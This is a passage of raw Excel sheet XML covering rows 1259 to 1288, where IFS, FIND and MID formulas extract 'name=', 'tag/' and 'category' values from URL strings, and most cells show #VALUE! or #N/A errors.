        <f t="array" ref="E1259">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1259)), MID($A1259, FIND("name=",$A1259) + 5, LEN($A1259) - FIND("name=",$A1259)),
    ISNUMBER(FIND("tag/",$A1259)), MID($A1259, FIND("tag/",$A1259) + 4, LEN($A1259) - FIND("tag/",$A1259)),
    ISNUMBER(FIND("category",$A1259)), MID($A1259, FIND("category",$A1259) + 9, LEN($A1259) - FIND("category",$A1259)))</f>
        <v>ova.html&amp;a=vx000&amp;dstr=@Ovatools</v>
      </c>
      <c r="F1259" t="s">
        <v>3349</v>
      </c>
    </row>
    <row r="1260" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1260" t="s">
        <v>2536</v>
      </c>
      <c r="B1260" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1260" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1260" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1260" t="e" cm="1">
        <f t="array" ref="E1260">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1260)), MID($A1260, FIND("name=",$A1260) + 5, LEN($A1260) - FIND("name=",$A1260)),
    ISNUMBER(FIND("tag/",$A1260)), MID($A1260, FIND("tag/",$A1260) + 4, LEN($A1260) - FIND("tag/",$A1260)),
    ISNUMBER(FIND("category",$A1260)), MID($A1260, FIND("category",$A1260) + 9, LEN($A1260) - FIND("category",$A1260)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1260" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1261" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1261" t="s">
        <v>2248</v>
      </c>
      <c r="B1261" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1261" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1261" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1261" t="e" cm="1">
        <f t="array" ref="E1261">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1261)), MID($A1261, FIND("name=",$A1261) + 5, LEN($A1261) - FIND("name=",$A1261)),
    ISNUMBER(FIND("tag/",$A1261)), MID($A1261, FIND("tag/",$A1261) + 4, LEN($A1261) - FIND("tag/",$A1261)),
    ISNUMBER(FIND("category",$A1261)), MID($A1261, FIND("category",$A1261) + 9, LEN($A1261) - FIND("category",$A1261)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1261" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1262" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1262" t="s">
        <v>2545</v>
      </c>
      <c r="B1262" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1262" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1262" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1262" t="e" cm="1">
        <f t="array" ref="E1262">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1262)), MID($A1262, FIND("name=",$A1262) + 5, LEN($A1262) - FIND("name=",$A1262)),
    ISNUMBER(FIND("tag/",$A1262)), MID($A1262, FIND("tag/",$A1262) + 4, LEN($A1262) - FIND("tag/",$A1262)),
    ISNUMBER(FIND("category",$A1262)), MID($A1262, FIND("category",$A1262) + 9, LEN($A1262) - FIND("category",$A1262)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1262" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1263" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1263" t="s">
        <v>2546</v>
      </c>
      <c r="B1263" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1263" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1263" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1263" t="e" cm="1">
        <f t="array" ref="E1263">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1263)), MID($A1263, FIND("name=",$A1263) + 5, LEN($A1263) - FIND("name=",$A1263)),
    ISNUMBER(FIND("tag/",$A1263)), MID($A1263, FIND("tag/",$A1263) + 4, LEN($A1263) - FIND("tag/",$A1263)),
    ISNUMBER(FIND("category",$A1263)), MID($A1263, FIND("category",$A1263) + 9, LEN($A1263) - FIND("category",$A1263)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1263" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1264" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1264" t="s">
        <v>2494</v>
      </c>
      <c r="B1264" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1264" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1264" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1264" t="e" cm="1">
        <f t="array" ref="E1264">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1264)), MID($A1264, FIND("name=",$A1264) + 5, LEN($A1264) - FIND("name=",$A1264)),
    ISNUMBER(FIND("tag/",$A1264)), MID($A1264, FIND("tag/",$A1264) + 4, LEN($A1264) - FIND("tag/",$A1264)),
    ISNUMBER(FIND("category",$A1264)), MID($A1264, FIND("category",$A1264) + 9, LEN($A1264) - FIND("category",$A1264)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1264" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1265" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1265" t="s">
        <v>2547</v>
      </c>
      <c r="B1265" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1265" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1265" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1265" t="e" cm="1">
        <f t="array" ref="E1265">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1265)), MID($A1265, FIND("name=",$A1265) + 5, LEN($A1265) - FIND("name=",$A1265)),
    ISNUMBER(FIND("tag/",$A1265)), MID($A1265, FIND("tag/",$A1265) + 4, LEN($A1265) - FIND("tag/",$A1265)),
    ISNUMBER(FIND("category",$A1265)), MID($A1265, FIND("category",$A1265) + 9, LEN($A1265) - FIND("category",$A1265)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1265" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1266" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1266" t="s">
        <v>2410</v>
      </c>
      <c r="B1266" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1266" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1266" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1266" t="e" cm="1">
        <f t="array" ref="E1266">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1266)), MID($A1266, FIND("name=",$A1266) + 5, LEN($A1266) - FIND("name=",$A1266)),
    ISNUMBER(FIND("tag/",$A1266)), MID($A1266, FIND("tag/",$A1266) + 4, LEN($A1266) - FIND("tag/",$A1266)),
    ISNUMBER(FIND("category",$A1266)), MID($A1266, FIND("category",$A1266) + 9, LEN($A1266) - FIND("category",$A1266)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1266" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1267" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1267" t="s">
        <v>2294</v>
      </c>
      <c r="B1267" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1267" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1267" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1267" t="e" cm="1">
        <f t="array" ref="E1267">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1267)), MID($A1267, FIND("name=",$A1267) + 5, LEN($A1267) - FIND("name=",$A1267)),
    ISNUMBER(FIND("tag/",$A1267)), MID($A1267, FIND("tag/",$A1267) + 4, LEN($A1267) - FIND("tag/",$A1267)),
    ISNUMBER(FIND("category",$A1267)), MID($A1267, FIND("category",$A1267) + 9, LEN($A1267) - FIND("category",$A1267)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1267" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1268" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1268" t="s">
        <v>2548</v>
      </c>
      <c r="B1268" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1268" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1268" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1268" t="e" cm="1">
        <f t="array" ref="E1268">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1268)), MID($A1268, FIND("name=",$A1268) + 5, LEN($A1268) - FIND("name=",$A1268)),
    ISNUMBER(FIND("tag/",$A1268)), MID($A1268, FIND("tag/",$A1268) + 4, LEN($A1268) - FIND("tag/",$A1268)),
    ISNUMBER(FIND("category",$A1268)), MID($A1268, FIND("category",$A1268) + 9, LEN($A1268) - FIND("category",$A1268)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1268" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1269" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1269" t="s">
        <v>2549</v>
      </c>
      <c r="B1269" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1269" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1269" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1269" t="e" cm="1">
        <f t="array" ref="E1269">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1269)), MID($A1269, FIND("name=",$A1269) + 5, LEN($A1269) - FIND("name=",$A1269)),
    ISNUMBER(FIND("tag/",$A1269)), MID($A1269, FIND("tag/",$A1269) + 4, LEN($A1269) - FIND("tag/",$A1269)),
    ISNUMBER(FIND("category",$A1269)), MID($A1269, FIND("category",$A1269) + 9, LEN($A1269) - FIND("category",$A1269)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1269" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1270" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1270" t="s">
        <v>2403</v>
      </c>
      <c r="B1270" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1270" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1270" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1270" t="e" cm="1">
        <f t="array" ref="E1270">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1270)), MID($A1270, FIND("name=",$A1270) + 5, LEN($A1270) - FIND("name=",$A1270)),
    ISNUMBER(FIND("tag/",$A1270)), MID($A1270, FIND("tag/",$A1270) + 4, LEN($A1270) - FIND("tag/",$A1270)),
    ISNUMBER(FIND("category",$A1270)), MID($A1270, FIND("category",$A1270) + 9, LEN($A1270) - FIND("category",$A1270)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1270" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1271" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1271" t="s">
        <v>2377</v>
      </c>
      <c r="B1271" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1271" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1271" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1271" t="e" cm="1">
        <f t="array" ref="E1271">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1271)), MID($A1271, FIND("name=",$A1271) + 5, LEN($A1271) - FIND("name=",$A1271)),
    ISNUMBER(FIND("tag/",$A1271)), MID($A1271, FIND("tag/",$A1271) + 4, LEN($A1271) - FIND("tag/",$A1271)),
    ISNUMBER(FIND("category",$A1271)), MID($A1271, FIND("category",$A1271) + 9, LEN($A1271) - FIND("category",$A1271)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1271" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1272" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1272" t="s">
        <v>2377</v>
      </c>
      <c r="B1272" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1272" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1272" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1272" t="e" cm="1">
        <f t="array" ref="E1272">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1272)), MID($A1272, FIND("name=",$A1272) + 5, LEN($A1272) - FIND("name=",$A1272)),
    ISNUMBER(FIND("tag/",$A1272)), MID($A1272, FIND("tag/",$A1272) + 4, LEN($A1272) - FIND("tag/",$A1272)),
    ISNUMBER(FIND("category",$A1272)), MID($A1272, FIND("category",$A1272) + 9, LEN($A1272) - FIND("category",$A1272)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1272" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1273" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1273" t="s">
        <v>2410</v>
      </c>
      <c r="B1273" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1273" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1273" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1273" t="e" cm="1">
        <f t="array" ref="E1273">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1273)), MID($A1273, FIND("name=",$A1273) + 5, LEN($A1273) - FIND("name=",$A1273)),
    ISNUMBER(FIND("tag/",$A1273)), MID($A1273, FIND("tag/",$A1273) + 4, LEN($A1273) - FIND("tag/",$A1273)),
    ISNUMBER(FIND("category",$A1273)), MID($A1273, FIND("category",$A1273) + 9, LEN($A1273) - FIND("category",$A1273)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1273" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1274" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1274" t="s">
        <v>2545</v>
      </c>
      <c r="B1274" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1274" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1274" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1274" t="e" cm="1">
        <f t="array" ref="E1274">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1274)), MID($A1274, FIND("name=",$A1274) + 5, LEN($A1274) - FIND("name=",$A1274)),
    ISNUMBER(FIND("tag/",$A1274)), MID($A1274, FIND("tag/",$A1274) + 4, LEN($A1274) - FIND("tag/",$A1274)),
    ISNUMBER(FIND("category",$A1274)), MID($A1274, FIND("category",$A1274) + 9, LEN($A1274) - FIND("category",$A1274)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1274" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1275" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1275" t="s">
        <v>2550</v>
      </c>
      <c r="B1275" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1275" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1275" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1275" t="e" cm="1">
        <f t="array" ref="E1275">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1275)), MID($A1275, FIND("name=",$A1275) + 5, LEN($A1275) - FIND("name=",$A1275)),
    ISNUMBER(FIND("tag/",$A1275)), MID($A1275, FIND("tag/",$A1275) + 4, LEN($A1275) - FIND("tag/",$A1275)),
    ISNUMBER(FIND("category",$A1275)), MID($A1275, FIND("category",$A1275) + 9, LEN($A1275) - FIND("category",$A1275)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1275" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1276" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1276" t="s">
        <v>2551</v>
      </c>
      <c r="B1276" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1276" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1276" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1276" t="e" cm="1">
        <f t="array" ref="E1276">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1276)), MID($A1276, FIND("name=",$A1276) + 5, LEN($A1276) - FIND("name=",$A1276)),
    ISNUMBER(FIND("tag/",$A1276)), MID($A1276, FIND("tag/",$A1276) + 4, LEN($A1276) - FIND("tag/",$A1276)),
    ISNUMBER(FIND("category",$A1276)), MID($A1276, FIND("category",$A1276) + 9, LEN($A1276) - FIND("category",$A1276)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1276" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1277" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1277" t="s">
        <v>2552</v>
      </c>
      <c r="B1277" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1277" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1277" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1277" t="e" cm="1">
        <f t="array" ref="E1277">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1277)), MID($A1277, FIND("name=",$A1277) + 5, LEN($A1277) - FIND("name=",$A1277)),
    ISNUMBER(FIND("tag/",$A1277)), MID($A1277, FIND("tag/",$A1277) + 4, LEN($A1277) - FIND("tag/",$A1277)),
    ISNUMBER(FIND("category",$A1277)), MID($A1277, FIND("category",$A1277) + 9, LEN($A1277) - FIND("category",$A1277)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1277" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1278" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1278" t="s">
        <v>2390</v>
      </c>
      <c r="B1278" t="str">
        <f t="shared" si="58"/>
        <v>ova.html&amp;a=vx000&amp;dstr=@Ovatools</v>
      </c>
      <c r="C1278" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1278" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1278" t="str" cm="1">
        <f t="array" ref="E1278">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1278)), MID($A1278, FIND("name=",$A1278) + 5, LEN($A1278) - FIND("name=",$A1278)),
    ISNUMBER(FIND("tag/",$A1278)), MID($A1278, FIND("tag/",$A1278) + 4, LEN($A1278) - FIND("tag/",$A1278)),
    ISNUMBER(FIND("category",$A1278)), MID($A1278, FIND("category",$A1278) + 9, LEN($A1278) - FIND("category",$A1278)))</f>
        <v>ova.html&amp;a=vx000&amp;dstr=@Ovatools</v>
      </c>
      <c r="F1278" t="s">
        <v>3349</v>
      </c>
    </row>
    <row r="1279" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1279" t="s">
        <v>2391</v>
      </c>
      <c r="B1279" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1279" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1279" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1279" t="e" cm="1">
        <f t="array" ref="E1279">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1279)), MID($A1279, FIND("name=",$A1279) + 5, LEN($A1279) - FIND("name=",$A1279)),
    ISNUMBER(FIND("tag/",$A1279)), MID($A1279, FIND("tag/",$A1279) + 4, LEN($A1279) - FIND("tag/",$A1279)),
    ISNUMBER(FIND("category",$A1279)), MID($A1279, FIND("category",$A1279) + 9, LEN($A1279) - FIND("category",$A1279)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1279" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1280" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1280" t="s">
        <v>2296</v>
      </c>
      <c r="B1280" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1280" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1280" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1280" t="e" cm="1">
        <f t="array" ref="E1280">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1280)), MID($A1280, FIND("name=",$A1280) + 5, LEN($A1280) - FIND("name=",$A1280)),
    ISNUMBER(FIND("tag/",$A1280)), MID($A1280, FIND("tag/",$A1280) + 4, LEN($A1280) - FIND("tag/",$A1280)),
    ISNUMBER(FIND("category",$A1280)), MID($A1280, FIND("category",$A1280) + 9, LEN($A1280) - FIND("category",$A1280)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1280" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1281" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1281" t="s">
        <v>2283</v>
      </c>
      <c r="B1281" t="str">
        <f t="shared" si="58"/>
        <v>Eva%20Lovia</v>
      </c>
      <c r="C1281" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1281" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1281" t="str" cm="1">
        <f t="array" ref="E1281">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1281)), MID($A1281, FIND("name=",$A1281) + 5, LEN($A1281) - FIND("name=",$A1281)),
    ISNUMBER(FIND("tag/",$A1281)), MID($A1281, FIND("tag/",$A1281) + 4, LEN($A1281) - FIND("tag/",$A1281)),
    ISNUMBER(FIND("category",$A1281)), MID($A1281, FIND("category",$A1281) + 9, LEN($A1281) - FIND("category",$A1281)))</f>
        <v>Eva%20Lovia</v>
      </c>
      <c r="F1281" t="s">
        <v>3311</v>
      </c>
    </row>
    <row r="1282" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1282" t="s">
        <v>2503</v>
      </c>
      <c r="B1282" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1282" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1282" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1282" t="e" cm="1">
        <f t="array" ref="E1282">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1282)), MID($A1282, FIND("name=",$A1282) + 5, LEN($A1282) - FIND("name=",$A1282)),
    ISNUMBER(FIND("tag/",$A1282)), MID($A1282, FIND("tag/",$A1282) + 4, LEN($A1282) - FIND("tag/",$A1282)),
    ISNUMBER(FIND("category",$A1282)), MID($A1282, FIND("category",$A1282) + 9, LEN($A1282) - FIND("category",$A1282)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1282" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1283" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1283" t="s">
        <v>2504</v>
      </c>
      <c r="B1283" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1283" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1283" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1283" t="e" cm="1">
        <f t="array" ref="E1283">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1283)), MID($A1283, FIND("name=",$A1283) + 5, LEN($A1283) - FIND("name=",$A1283)),
    ISNUMBER(FIND("tag/",$A1283)), MID($A1283, FIND("tag/",$A1283) + 4, LEN($A1283) - FIND("tag/",$A1283)),
    ISNUMBER(FIND("category",$A1283)), MID($A1283, FIND("category",$A1283) + 9, LEN($A1283) - FIND("category",$A1283)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1283" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1284" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1284" t="s">
        <v>2377</v>
      </c>
      <c r="B1284" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1284" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1284" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1284" t="e" cm="1">
        <f t="array" ref="E1284">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1284)), MID($A1284, FIND("name=",$A1284) + 5, LEN($A1284) - FIND("name=",$A1284)),
    ISNUMBER(FIND("tag/",$A1284)), MID($A1284, FIND("tag/",$A1284) + 4, LEN($A1284) - FIND("tag/",$A1284)),
    ISNUMBER(FIND("category",$A1284)), MID($A1284, FIND("category",$A1284) + 9, LEN($A1284) - FIND("category",$A1284)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1284" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1285" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1285" t="s">
        <v>2377</v>
      </c>
      <c r="B1285" t="e">
        <f t="shared" si="58"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1285" t="e">
        <f t="shared" si="59"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1285" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1285" t="e" cm="1">
        <f t="array" ref="E1285">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1285)), MID($A1285, FIND("name=",$A1285) + 5, LEN($A1285) - FIND("name=",$A1285)),
    ISNUMBER(FIND("tag/",$A1285)), MID($A1285, FIND("tag/",$A1285) + 4, LEN($A1285) - FIND("tag/",$A1285)),
    ISNUMBER(FIND("category",$A1285)), MID($A1285, FIND("category",$A1285) + 9, LEN($A1285) - FIND("category",$A1285)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1285" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1286" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1286" t="s">
        <v>2390</v>
      </c>
      <c r="B1286" t="str">
        <f t="shared" ref="B1286:B1349" si="61">IF(FIND("name=",A1286,1)&gt;0,MID(A1286,FIND("name=",A1286,1)+5,LEN(A1286)-FIND("name=",A1286,1)),"")</f>
        <v>ova.html&amp;a=vx000&amp;dstr=@Ovatools</v>
      </c>
      <c r="C1286" t="e">
        <f t="shared" ref="C1286:C1349" si="62">IF(FIND("tag/",$A1286,1)&gt;0,MID($A1286,FIND("tag/",$A1286,1)+4,LEN($A1286)-FIND("tag/",$A1286,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D1286" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1286" t="str" cm="1">
        <f t="array" ref="E1286">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1286)), MID($A1286, FIND("name=",$A1286) + 5, LEN($A1286) - FIND("name=",$A1286)),
    ISNUMBER(FIND("tag/",$A1286)), MID($A1286, FIND("tag/",$A1286) + 4, LEN($A1286) - FIND("tag/",$A1286)),
    ISNUMBER(FIND("category",$A1286)), MID($A1286, FIND("category",$A1286) + 9, LEN($A1286) - FIND("category",$A1286)))</f>
        <v>ova.html&amp;a=vx000&amp;dstr=@Ovatools</v>
      </c>
      <c r="F1286" t="s">
        <v>3349</v>
      </c>
    </row>
    <row r="1287" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1287" t="s">
        <v>2410</v>
      </c>
      <c r="B1287" t="e">
        <f t="shared" si="61"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1287" t="e">
        <f t="shared" si="62"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1287" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1287" t="e" cm="1">
        <f t="array" ref="E1287">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1287)), MID($A1287, FIND("name=",$A1287) + 5, LEN($A1287) - FIND("name=",$A1287)),
    ISNUMBER(FIND("tag/",$A1287)), MID($A1287, FIND("tag/",$A1287) + 4, LEN($A1287) - FIND("tag/",$A1287)),
    ISNUMBER(FIND("category",$A1287)), MID($A1287, FIND("category",$A1287) + 9, LEN($A1287) - FIND("category",$A1287)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1287" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1288" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1288" t="s">
        <v>2368</v>
      </c>
      <c r="B1288" t="e">
        <f t="shared" si="61"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1288" t="e">
        <f t="shared" si="62"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1288" t="e">
        <f t="shared" si="60"/>
        <v>#VALUE!</v>
      </c>
